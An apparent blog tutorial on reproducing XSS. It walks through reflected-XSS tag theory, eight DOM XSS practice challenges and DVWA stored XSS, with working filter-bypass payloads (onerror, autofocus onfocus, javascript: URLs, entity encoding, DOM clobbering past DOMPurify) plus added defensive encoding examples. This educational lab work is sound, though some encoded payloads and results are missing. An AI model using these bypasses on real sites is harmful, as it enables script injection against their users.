XSS Reproduction

2024/12/25 12:35:39

Contents

A brief introduction to XSS
I. Reflected XSS: vulnerability logic; why some tags trigger and others do not (tags that can trigger, tags that cannot, and why)
II. DOM XSS: 1 Ma Spaghet!, 2 Jefff, 3 Ugandan Knuckles, 4 Ricardo Milos, 5 Ah That's Hawt, 6 Ligma, 7 Mafia, 8 Ok, Boomer (requirement, analysis and result for each)
III. Stored XSS: vulnerability principle; reproduction at the low, Medium and high levels

A brief introduction to XSS

XSS is a web security vulnerability that lets an attacker affect users by injecting malicious script into a web page. The main types are reflected XSS, DOM-based XSS and stored XSS. Defences include input validation, escaping user input, and using HttpOnly cookies. This article walks through the principles of each kind of XSS attack and how to defend against them.

I. Reflected XSS

        1. Vulnerability logic:

                The front end can parse JavaScript, and a reflected XSS payload is also JavaScript: the user submits JS code, and without proper filtering that code is placed into the front end and parsed, which is what creates the vulnerability.

Note that not every tag works; an XSS payload written at random that does not get parsed achieves nothing and may only give the attempt away.

Commonly used JS functions:

        alert()

        confirm()

        prompt()

All browser JS shares one common ancestor (window), which is why problems arise so easily.

Why some tags can trigger and others cannot

Tags that can trigger

In reflected XSS, many HTML tags can be used to trigger the attack under particular conditions. These tags usually carry event-handler attributes such as onerror, onmouseover and onclick, which can execute JavaScript. Some common tags that can trigger XSS, with examples:

  1. <img>: through the onerror handler, the JavaScript inside it runs when the image fails to load. For example: <img src="x" onerror="alert('XSS')">

  2. <script>: the most direct way, used to insert and run JavaScript directly. In many cases, however, the <script> tag is filtered, so an attacker has to look for ways around the filter.

  3. <a>: triggers XSS through a pseudo-protocol in the href attribute (such as javascript:) or in combination with an onclick handler. For example: <a href="javascript:alert('XSS')">Click me</a>

  4. Form elements such as <input> and <button>: these can trigger XSS through handlers such as onclick and onsubmit.

Tags that cannot trigger

Not every HTML tag can be used directly to trigger XSS. Some tags cannot be used for this purpose because they contain no executable JavaScript and no event-handler attributes. Note, however, that even tags which cannot trigger XSS on their own may be used to build a more complex attack, for example by changing the DOM structure so as to indirectly influence a tag that can.

In general, the following kinds of tag are unlikely to trigger XSS directly:

Purely presentational tags: such as <p> and <h1>, which only display text and carry no executable code or event handlers.

Tags without event handlers: if a tag does not contain, or does not allow adding, event-handler attributes (such as onclick or onerror), it cannot be used directly to trigger XSS.

Why certain tags can trigger and others cannot

  1. Event-handler attributes: tags that can trigger XSS usually carry event-handler attributes, which run JavaScript when the corresponding event fires.

  2. Filtering: many web applications implement input filtering to block or limit the insertion of dangerous tags such as <script>. So even if a tag can trigger XSS in theory, in practice it may be held back by the filter.

  3. Browser security policies: modern browsers implement several policies against XSS, including Content Security Policy (CSP) and the same-origin policy, which can limit or forbid certain kinds of script execution or resource loading.
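As an added example (not code from the original post), the defensive counterpart of the list above: context-aware output encoding for an h2 sink and a scheme allowlist for URL-valued attributes (href, src, form action), checked against the payload shapes this post uses (img onerror, javascript: and mailto: links). The function names and the http(s)-only allowlist are assumptions for this demo.

```javascript
// Added example, not from the original post. Output encoding plus a URL
// scheme allowlist: the two controls that make the tags listed above inert.

// Encode the five characters that matter in HTML text and double-quoted
// attribute values. The data is still displayed verbatim, just as text.
function encodeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Allowlist for URL-valued attributes (href, src, form action).
// Only http(s) and relative URLs pass; javascript:, data:, mailto: and every
// other scheme are rejected (deny by default). Control characters and spaces
// are removed first because browsers drop tabs and newlines anywhere in a URL
// and trim leading control characters, so "java\tscript:" would otherwise be
// mistaken for an unknown, harmless scheme. Apps that need mailto: or tel:
// can add them, provided no added scheme can carry script.
function isSafeUrl(url) {
  const cleaned = String(url).replace(/[\u0000-\u0020\u007f]/g, '').toLowerCase();
  const hasScheme = /^[a-z][a-z0-9+.-]*:/.test(cleaned);
  return !hasScheme || /^https?:/.test(cleaned);
}

// The h2 sink from the reflected and "Ma Spaghet" cases, with encoding applied.
function renderHeading(name) {
  return '<h2>Hello, ' + encodeHtml(name) + '!</h2>';
}

// A link whose href and text both come from user data. A rejected URL is
// replaced by "#" instead of being dropped silently, so the issue is visible.
function renderLink(href, text) {
  const safeHref = isSafeUrl(href) ? href : '#';
  return '<a href="' + encodeHtml(safeHref) + '">' + encodeHtml(text) + '</a>';
}

// A form action taken from a query parameter (the "Ricardo Milos" shape).
// Returns null rather than a form when the URL fails the allowlist.
function renderForm(action) {
  if (!isSafeUrl(action)) return null;
  return '<form action="' + encodeHtml(action) + '" method="post"></form>';
}

// Constructed samples mirroring the post's payload shapes.
const SAMPLES = {
  imgOnerror: '<img src="x" onerror="alert(\'XSS\')">',
  jsHref: "javascript:alert('XSS')",
  mailtoHref: 'mailto:alert(1337)',
  obfuscatedScheme: ' java\tscript:alert(1)',
};
```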

II. DOM XSS

        Using an online DOM XSS practice platform.

1. Ma Spaghet!

Requirement:

        Pop up 1337 without any user interaction (no tag that needs clicking or the like).

Analysis:

Every passed parameter is placed directly into the h2 tag.

<script>alert(1)</script>

This tag is treated as dangerous and is not executed when inserted this way (innerHTML does not run <script> elements), so try an img tag instead; innerHTML only neutralises <script></script>.

?somebody=<img%20src=1%20onerror="alert(1337)">

Result:

2. Jefff

Requirement:

        Pop up 1337 without any user interaction (no tag that needs clicking or the like).

Analysis:

        We can see that the h2 is populated with innerText, so trying anything at maname.innerText = ma is basically hopeless. The only place left to work is inside the eval.

Attempt 1: close the double quote, then close the double quote again after the payload.

        Principle: eval(`ma = "Ma name aaa" ;alert(12);""`)

        Try the input: ?jeff=aaa";alert(1337);"

Attempt 2: use an operator to join the pieces instead:

        Try the input: ?jeff=asd" ;-alert(12)-"

Result:

3. Ugandan Knuckles

Requirement:

        Pop up 1337 without any user interaction (no tag that needs clicking or the like).

Analysis:

        wey = wey.replace(/[<>]/g, '') ----- filters out < and >

Attempt: close the double quote.

               wey=aaa" onclick="alert(1337)        but this requires user interaction

        onfocus does not focus the element by itself, so we also need the autofocus attribute to focus it automatically; then the handler fires with no user involvement.

Try the input: ?wey=aaa"onfocus="alert(1337)"autofocus="true

Result:

4. Ricardo Milos

Requirement:

        Pop up 1337 without any user interaction (no tag that needs clicking or the like).

Analysis:

        This code submits the form after 2 seconds; the submission target is whatever path ricardo.action receives, and that path comes from the GET parameter ricardo. The action attribute accepts the javascript: pseudo-protocol.

Attempt: ?ricardo=javascript:alert(1337)

Result:

5. Ah That's Hawt

Requirement:

        Pop up 1337 without any user interaction (no tag that needs clicking or the like).

Analysis:

        smith = smith.replace(/[\(\`\)\\]/g, '')         filters out parentheses, backticks and the backslash.

        smith.replace does the filtering, but we can get around it with encoding.

Attempt: markassbrownlee=<img src=1 onerror="alert(1)">

        The parameter travels in the URL, so if we simply URL-encode the parentheses of (1336) the browser decodes them before the value reaches smith, and the filter still strips them. HTML character references, by contrast, are only decoded when the markup is parsed, after the filter has run; but the URL has to obey URL rules, so the entity-encoded form cannot be passed as-is and is URL-encoded on top.

Entity-encoded:

        markassbrownlee=<img src=1 onerror="alert&#40;1336&#41;">

URL-encoded:

        markassbrownlee=<img src=1 onerror="alert%26%2340%3B1336%26%2341%3B">
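As an added example (not from the original post), the three decoding layers the analysis above depends on, run in order over the post's URL-encoded payload, next to the check a defender should run instead: canonicalise first, then validate. It assumes the filtered value ends up in an innerHTML sink, so character references are decoded only at the last step; the function names are assumptions for this demo.

```javascript
// Added example, not from the original post. Reproduces the layering of the
// "Ah That's Hawt" case (URL decoding, then the regex filter, then HTML
// parsing) and shows validation after canonicalisation.
// Assumed: the filtered value is assigned to innerHTML.

const BLOCKED = /[(`)\\]/;          // the challenge's filter set, as quoted above

// Step 1: the browser URL-decodes the query string before the page's script
// ever sees the value.
function valueFromQuery(query, key) {
  return new URLSearchParams(query).get(key) ?? '';
}

// Step 2: the challenge's own filter, applied to that decoded string.
function smithFilter(value) {
  return value.replace(new RegExp(BLOCKED.source, 'g'), '');
}

// Step 3: minimal decoder for numeric character references (&#40; / &#x28;),
// standing in for what the HTML parser does when innerHTML is assigned.
// Constructed for this demo; a real parser also handles named references.
function decodeNumericEntities(markup) {
  return markup.replace(/&#(x[0-9a-f]+|[0-9]+);/gi, (_, num) => {
    const code = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return String.fromCodePoint(code);
  });
}

// The vulnerable order: filter the raw string, then let the parser decode it.
// Whatever the parser decodes afterwards was never inspected.
function filterThenParse(query, key) {
  return decodeNumericEntities(smithFilter(valueFromQuery(query, key)));
}

// The corrected order: canonicalise to the form the sink will see, then
// validate that form. Returns null when a blocked character appears.
// (This only repairs a blocklist; the real fix is a non-HTML sink such as
// textContent, or encoding the value for the context it lands in.)
function parseThenValidate(query, key) {
  const canonical = decodeNumericEntities(valueFromQuery(query, key));
  return BLOCKED.test(canonical) ? null : canonical;
}

// Constructed query string in the post's URL-encoded form (alert(1336)).
const SAMPLE_QUERY =
  'markassbrownlee=<img src=1 onerror="alert%26%2340%3B1336%26%2341%3B">';
```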

Result:

6. Ligma

Requirement:

        Pop up 1337 without any user interaction (no tag that needs clicking or the like).

Analysis:

        Letters and digits are filtered out and the result is passed straight to eval. This calls for JSFuck, which can rewrite ordinary JS into a string made up of only six characters: [, ], (, ), ! and +.

Input alert(1337)
JSFuck-encoded:


URL-encoded:


Try the input: pass the URL-encoded JSFuck string as the balls query parameter (?balls=<encoded string>).


Result:

7. Mafia

Requirement:

        Pop up 1337 without any user interaction (no tag that needs clicking or the like).

Analysis:

        Filtering applied: the string is truncated to 50 characters;
                        ' " + - ! \ [ ] are replaced with _;
                        alert is replaced with _.

Define an anonymous function, build the payload from the function's argument, and use a regular expression to get past the check for the string alert.

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

Alternatively, use the conversion between numbers and strings to get past the check for alert.

?mafia=eval(8680439..toString(30))(1337)
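As an added example (not from the original post) covering the Jefff, Ligma and Mafia cases together: all three sinks splice user data into JavaScript source and eval it, so blocklists on quotes, letters or the word alert are beside the point (the 8680439..toString(30) trick above shows why). The demo contrasts the Jefff string-building with a version that cannot leave the literal, and adds a canary harness a defender can keep as a regression test. Function names are assumptions for the demo.

```javascript
// Added example, not from the original post. Vulnerable versus hardened
// construction of eval'd source, plus a canary harness for regression tests.

// Vulnerable shape (the Jefff analysis): the parameter lands inside a
// double-quoted literal, so a quote in the input terminates the literal.
function buildSourceVulnerable(jeff) {
  return 'ma = "Ma name ' + jeff + '"';
}

// Hardened shape: JSON.stringify emits one string literal with ", \, newlines
// and U+2028/U+2029 escaped, so no input can end it early. (Better still is
// to generate no source at all and assign the string directly.)
function buildSourceSafe(jeff) {
  return 'ma = ' + JSON.stringify('Ma name ' + jeff);
}

// Canary harness: run the generated source with `alert` bound to a recorder.
// Returns the list of argument lists alert was called with; a non-empty list
// means the input escaped the literal and executed as code. `ma` is declared
// locally so the assignment does not create a global.
function alertCanary(source) {
  const calls = [];
  const run = new Function('alert', 'var ma; ' + source + ';');
  run((...args) => { calls.push(args); });
  return calls;
}

// Evaluate the generated source and return what `ma` ends up holding.
function evaluateMa(source) {
  return new Function('var ma; ' + source + '; return ma;')();
}

// Constructed inputs: the two payloads quoted in the Jefff analysis and a
// harmless name.
const INPUTS = {
  closeQuote: 'aaa";alert(1337);"',
  minusJoin: 'asd" ;-alert(12)-"',
  benign: 'Ma Name Jefff',
};
```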

Result:

8. Ok, Boomer

Requirement:

        Pop up 1337 without any user interaction (no tag that needs clicking or the like).

Analysis:

The page uses the third-party library DOMPurify to filter out illegal characters.

In setTimeout(ok, 2000), ok may be either a function or a string; if we can inject an executable payload into the variable ok, the pop-up will fire.

DOM clobbering can be used: by injecting DOM elements into the HTML we get to manipulate JavaScript variables.

First construct a variable ok by creating a DOM element with id=ok. ok needs to receive a string as its value, and when toString() is called on an <a> element it returns the value of its href attribute, so the <a> tag is the one to build on.

Reading the DOMPurify source shows that the protocols it allows include mailto, tel, xmpp and others.

Try the input:

        ?boomer=<a%20id=ok%20href=mailto:alert(1337)>

Result:

III. Stored XSS

Vulnerability principle:

Stored XSS, also called persistent XSS, is where the attack script is stored permanently in the target server's database or files, which makes it very hard to notice. Unlike reflected XSS, in stored XSS the attacker submits the malicious payload through a message board or blog system and the back end stores it; when other users visit the page they are attacked, with no need for the user to click on the payload.

Reproduction:

low level:

                Enter the low-level stored XSS module.

                Try a simple JavaScript statement for the attack.

                First set the security level to low.

XSS (Stored)

Source review: the input passes through stripslashes and mysqli_real_escape_string, and the data is finally inserted and displayed on index.php.

Try inserting our malicious code and see whether it works.

Medium level:

Using the low-level attack, we find that <script> is filtered:

Reading the back-end code shows that, as in the corresponding reflected XSS module, the <script> tag is filtered.

Use the img tag:

<img%20src=1%20onerror="alert(1337)">

high level:

Note: the length limit on the name input field has to be modified again to get past it.

At the high level neither the low-level nor the medium-level attack succeeds.

As with reflected XSS, the high level of the stored XSS module also uses a replace call to strip the <script> tag completely.

Try an attack with the img tag.

Code: <img src=x onerror=alert('xss') >

Source: http://www.coloradmin.cn/o/2061938.html
